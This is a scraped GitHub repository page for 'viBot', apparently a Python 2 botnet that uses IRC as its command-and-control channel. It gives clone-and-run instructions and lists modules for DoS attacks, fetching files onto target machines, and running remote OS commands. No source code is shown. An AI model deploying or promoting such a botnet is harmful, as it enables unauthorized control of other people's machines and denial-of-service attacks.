Skip to content
/ viBot Public

A botnet project, that uses IRC as C&C server.

License

Notifications You must be signed in to change notification settings

zenzue/viBot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

viBot

A fully native and cross-platform botnet project, that uses IRC as C&C server.

Installation

~$ git clone https://github.com/blackvkng/viBot.git
~$ cd viBot
~$ python2 viBot.py

Usage

irc client: [module] [ARGS]

Available Modules

  • dos module // start a dos attack to target

    • usage
  • info module // get some info about target system

    • usage
      • irc client: info
  • wget module // download files to target from internet

    • usage
      • irc client: wget FILEURL FILE NAME TO SAVE
  • popup module // show a popup message on target system

    • usage
      • irc client: popup TEXT
  • execute module // execute os commands on target and get output of commands

    • usage
      • irc client: execute COMMAND

Screenshots

dos module

alt tag

info module

alt tag

wget module

alt tag

popup module

alt tag

execute module

alt tag

Demo

alt tag

About

A botnet project, that uses IRC as C&C server.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages